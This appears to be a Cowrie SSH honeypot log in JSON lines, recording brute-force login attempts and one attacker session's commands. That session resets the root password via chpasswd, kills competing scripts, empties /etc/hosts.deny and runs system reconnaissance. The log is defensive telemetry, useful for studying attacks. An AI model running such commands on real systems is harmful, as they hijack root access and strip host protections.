{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:35.808674Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44608,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd38d923a64e","protocol":"ssh","message":"New connection: 212.227.235.229:44608 (1.2.3.4:22) [session: cd38d923a64e]","sensor":"my-vps","timestamp":"2025-08-31T06:53:36.050653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:53:36.052035Z","src_ip":"212.227.235.229","session":"cd38d923a64e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:53:36.299948Z","src_ip":"212.227.235.229","session":"cd38d923a64e"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:36.999151Z","src_ip":"212.227.125.160","session":"4d9e8abe978a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:53:37.326475Z","src_ip":"212.227.235.229","session":"cd38d923a64e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:38.573190Z","src_ip":"212.227.235.229","session":"cd38d923a64e"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:53:42.443516Z","src_ip":"212.227.235.229","session":"e1780e237812"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:43.592810Z","src_ip":"203.195.83.91","session":"b94c351104c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48604,"dst_ip":"1.2.3.4","dst_port":22,"session":"d71d9640d244","protocol":"ssh","message":"New connection: 212.227.125.160:48604 (1.2.3.4:22) [session: d71d9640d244]","sensor":"my-vps","timestamp":"2025-08-31T06:53:45.051004Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:47.273237Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-31T06:53:47.273900Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:47.540333Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:49.104911Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"echo \"root:s1GD55K30UOV\"|chpasswd|bash","message":"CMD: echo \"root:s1GD55K30UOV\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-31T06:53:49.105632Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4c9f41dd9fd40e8805f4b188b966d35cf9ec4195b0474995b3ea11e20ad1ae58","size":21,"shasum":"4c9f41dd9fd40e8805f4b188b966d35cf9ec4195b0474995b3ea11e20ad1ae58","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/4c9f41dd9fd40e8805f4b188b966d35cf9ec4195b0474995b3ea11e20ad1ae58 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:49.373014Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:49.922064Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-31T06:53:49.922771Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-31T06:53:50.191458Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:50.192373Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:50.780851Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-31T06:53:50.781549Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:51.047197Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:51.635090Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-31T06:53:51.635841Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:51.901765Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:52.893791Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-31T06:53:52.894839Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-31T06:53:52.895861Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:53.162624Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:53.720569Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-31T06:53:53.721476Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:53.986715Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:55.538517Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-31T06:53:55.539210Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:55.804204Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.closed","duration":"41.6","message":"Connection lost after 41.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:56.006295Z","src_ip":"212.227.235.229","session":"e1780e237812"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:56.395555Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-31T06:53:56.396258Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:56.660728Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:57.249156Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-31T06:53:57.249872Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:57.515230Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:58.101228Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-31T06:53:58.101921Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:58.367535Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:53:59.353055Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-31T06:53:59.353862Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:53:59.618827Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:54:00.668566Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T06:54:00.669455Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:00.938216Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:54:01.527346Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T06:54:01.528391Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:01.793707Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:54:02.387717Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-31T06:54:02.388510Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:02.654610Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:54:03.249979Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-31T06:54:03.251062Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:03.518183Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.session.closed","duration":"31.3","message":"Connection lost after 31.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:03.519809Z","src_ip":"212.227.235.229","session":"e23c4d90e602"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:54:03.670276Z","src_ip":"212.227.125.160","session":"d71d9640d244"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:54:03.671047Z","src_ip":"212.227.125.160","session":"d71d9640d244"}
{"eventid":"cowrie.session.closed","duration":46.348689794540405,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:08.671117Z","src_ip":"103.77.214.206","session":"b3f6b20834c3"}
{"eventid":"cowrie.session.closed","duration":46.3448600769043,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:09.715904Z","src_ip":"212.227.125.160","session":"7102eb7ddc9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48922,"dst_ip":"1.2.3.4","dst_port":22,"session":"05bf9fa7b51d","protocol":"ssh","message":"New connection: 212.227.235.229:48922 (1.2.3.4:22) [session: 05bf9fa7b51d]","sensor":"my-vps","timestamp":"2025-08-31T06:54:10.116294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:54:10.804726Z","src_ip":"212.227.235.229","session":"05bf9fa7b51d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:54:10.846012Z","src_ip":"212.227.235.229","session":"05bf9fa7b51d"}
{"eventid":"cowrie.login.failed","username":"user","password":"root123","message":"login attempt [user/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:54:16.523880Z","src_ip":"212.227.235.229","session":"05bf9fa7b51d"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:54:18.258281Z","src_ip":"212.227.235.229","session":"05bf9fa7b51d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39526,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6ac25d06136","protocol":"ssh","message":"New connection: 212.227.125.160:39526 (1.2.3.4:22) [session: c6ac25d06136]","sensor":"my-vps","timestamp":"2025-08-31T06:54:22.334069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:54:23.677921Z","src_ip":"212.227.125.160","session":"c6ac25d06136"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh